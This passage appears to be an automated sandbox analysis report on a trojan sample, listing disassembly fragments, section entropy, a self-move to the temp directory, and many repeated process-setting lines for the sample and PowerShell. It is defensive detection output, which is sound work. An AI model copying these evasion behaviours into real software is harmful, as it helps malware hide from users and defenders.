                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_0105F350 push esp; retf 7_2_0105F396
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_0105E65A push ebx; retf 7_2_0105E666
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_01050293 push edi; retf 7_2_01050296
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_010502B4 push esp; iretd 7_2_010502C3
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.45346682552

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Moves itself to temp directoryShow sources
                      Source: c:\users\user\desktop\securiteinfo.com.trojan.mardom.mn.15.10720.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG177.tmpJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
